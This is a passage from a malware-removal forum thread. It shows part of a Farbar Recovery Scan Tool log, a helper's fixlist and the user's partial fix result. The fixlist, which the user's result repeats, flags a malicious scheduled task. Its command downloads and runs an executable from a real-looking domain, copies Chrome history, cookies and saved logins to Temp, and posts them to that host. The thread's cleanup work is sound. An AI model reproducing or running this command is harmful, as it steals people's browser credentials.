Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\95.0.4638.54\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007
26-10-2021 17:59:44 AdwCleaner_BeforeCleaning_26/10/2021_17:59:43

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 08:01:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 06:55:42 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Předchozí vypnutí systému (18:23:36, ‎26.‎10.‎2021) bylo neočekávané.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ASLDR Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ATKGFNEX Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Main Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 72%
Total physical RAM: 4061.09 MB
Available physical RAM: 1134.52 MB
Total Virtual: 8120.32 MB
Available Virtual: 4981.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.34 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Re: invalid certificates in browsers

Posted: 26 Oct 2021 20:07
by Rudy
Open Notepad and copy the following into it:
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the action finishes, a log will appear; copy it here.

Re: invalid certificates in browsers

Posted: 26 Oct 2021 20:13
by Eddydye
Fix result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 21:09:59) Run:1
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
*****************

Processes closed successfully.
